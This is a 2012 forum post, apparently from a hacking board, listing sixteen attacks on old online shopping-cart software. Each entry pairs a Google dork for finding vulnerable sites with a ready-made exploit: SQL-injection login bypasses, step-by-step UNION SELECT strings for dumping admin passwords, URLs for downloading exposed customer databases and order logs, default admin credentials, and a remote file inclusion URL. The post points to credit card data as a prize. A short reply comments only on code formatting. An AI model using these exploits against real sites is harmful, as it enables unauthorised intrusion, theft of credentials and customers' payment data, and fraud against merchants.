LegioNRST Posted July 2, 2012 Report Posted July 2, 2012 Most of these are outdated but they can still work if you happen to find a vulnerable site:1:google dork :--> inurl:"/cart.php?m="target looks lile :--> http://xxxxxxx.com/s...cart.php?m=viewexploit: chage cart.php?m=view to /admintarget whit exploit :--> http://xxxxxx.com/store/adminUsename : 'or"="Password : 'or"="2-google dork :--> allinurlroddetail.asp?prod=target looks like :--> www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers )exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdbtarget whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb3-google dork :--> allinurl: /cgi-local/shopper.cgitarget looks like :--> http://www.xxxxxx.co....dd=action&key=exploit :--> ...&template=order.logtarget whit exploit :--> http://www.xxxxxxxx.....late=order.log4-google dork :--> allinurl: Lobby.asptarget looks like :--> www.xxxxx.com/mall/lobby.aspexploit :--> change /mall/lobby.asp to /fpdb/shop.mdbtarget whit exploit :--> www.xxxxx.com/fpdb/shop.mdb5-google dork :--> allinurl:/vpasp/shopsearch.aspwhen u find a target put this in search boxKeyword=&category=5); insert into tbluser (fldusername) values('')--&SubCategory=&hide=&action.x=46&action.y=6Keyword=&category=5); update tbluser set fldpassword='' wherefldusername=''--&SubCategory=All&action.x=33&action.y=6Keyword=&category=3); update tbluser set fldaccess='1' wherefldusername=''--&SubCategory=All&action.x=33&action.y=6Jangan lupa untuk mengganti dan nya terserah kamu.Untuk mengganti password admin, masukkan keyword berikut :Keyword=&category=5); update tbluser set fldpassword='' wherefldusername='admin'--&SubCategory=All&action.x=33&action.y=6login page: http://xxxxxxx/vpasp/shopadmin.asp6-google dork :--> allinurl:/vpasp/shopdisplayproducts.asptarget looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxxexploit :--> http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-if this is not working try this ends%20'a%25'--%20'b%25'--%20'c%25'--after finding user and pass go to login page:http://xxxx.com/vpasp/shopadmin.asp7-google dork :--> allinurl:/shopadmin.asptarget looks like :--> www.xxxxxx.com/shopadmin.aspexploit:user : 'or'1pass : 'or'18-google.com :--> allinurl:/store/index.cgi/page=target looks like :--> http://www.xxxxxx.co....short_blue.htmexploit :--> ../admin/files/order.logtarget whit exploit :--> http://www.xxxxxxx.c....iles/order.log9-google.com:--> allinurl:/metacart/target looks like :--> www.xxxxxx.com/metacart/about.aspexploit :--> /database/metacart.mdbtarget whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb10-google.com:--> allinurl:/DCShop/target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxxexploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txttarget whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt11-google.com:--> allinurl:/shop/category.asp/catid=target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxxexploit :--> /admin/dbsetup.asptarget whit exploit :--> www.xxxxxx.com/admin/dbsetup.aspafter geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)in db look for access to find pass and user of shop admins.12-google.com:--> allinurl:/commercesql/target looks like :--> www.xxxxx.com/commercesql/xxxxxexploit :--> cgi-bin/commercesql/index.cgi?page=target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pltarget whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgitarget whit exploit order.log :--> http://www.xxxxx.com....iles/order.log13-google.com:--> allinurl:/eshop/target looks like :--> www.xxxxx.com/xxxxx/eshopexploit :-->/cg-bin/eshop/database/order.mdbtarget whit exploit :--> http://www.xxxxxx.co....base/order.mdbafter dl the db look at access for user and password14-1/search google: allinurl:"shopdisplayproducts.asp?id=--->http://victim.com/shopdisplayproducts.asp?id=52/find error by adding '--->http://victim.com/shopdisplayproducts.asp?id=5'--->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467-If you don't see error then change id to cat--->http://victim.com/shopdisplayproducts.asp?cat=5'3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password--->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password--->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......4/ add 2,3,4,5,6.......until you see a nice tableadd 2---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_passwordthen 3---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_passwordthen 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password...5,6,7,8,9.... untill you see a table. (exp:...47)---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password---->see a table.5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password--->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password6/Find link admin to login:try this first: http://victim.com/shopadmin.aspor: http://victim.com/shopadmin.aspDidn't work? then u have to find yourself:add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password--->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_passwordyou'll see something like: ( lot of them)shopaddmoretocart.aspshopcheckout.aspshopdisplaycategories.asp..............then guess admin link by adding the above data untill you find admin links15-Type: VP-ASP Shopping CartVersion: 5.00Dork = intitle:VP-ASP Shopping Cart 5.00You will find many websites with VP-ASP 5.00 cart software installedNow let's get to the exploit..the page will be like this ****://***.victim.com/shop/shopdisplaycategories.aspThe exploit is : diag_dbtest.aspso do this:****://***.victim.com/shop/diag_dbtest.aspA page will appear with something like:xDatabaseshopping140xDblocationresxxdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.the most important thing here is xDatabasexDatabase: shopping140ok now the URL will be like this:****://***.victim.com/shop/shopping140.mdbif you didn't download the Database..Try this while there is dblocation.xDblocationresxthe url will be:****://***.victim.com/shop/resx/shopping140.mdbIf u see the error message you have to try this :****://***.victim.com/shop/shopping500.mdbdownload the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.cominside you should be able to find credit card information.and you should even be able to find the admin username and password for the website.the admin login page is usually located here****://***.victim.com/shop/shopadmin.aspif you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which areUsername: adminpassword: adminORUsername: vpasppassword: vpasp16-Sphider Version 1.2.x (include_dir) remote file inclusion# Sphider Version 1.2.x (include_dir) remote file inclusion# script Vendor: http://cs.ioc.ee/~ando/sphider/# Discovered by: IbnuSinafound on index.php$include_dir = "./include"; <--- no patch here$language_dir = "./languages";include "$include_dir/index_header.inc";include "$include_dir/conf.php";include "$include_dir/connect.php";exploitz : http://targe.lu/[sphiderpath]/index.php?include_dir=injekan.lu PS: Nu am sursa. Quote
adonisslanic Posted July 2, 2012 Report Posted July 2, 2012 Sper ca nu e doar la mine, dar culorile din #CODE sunt ORIBILE cand recunoaste PHP Quote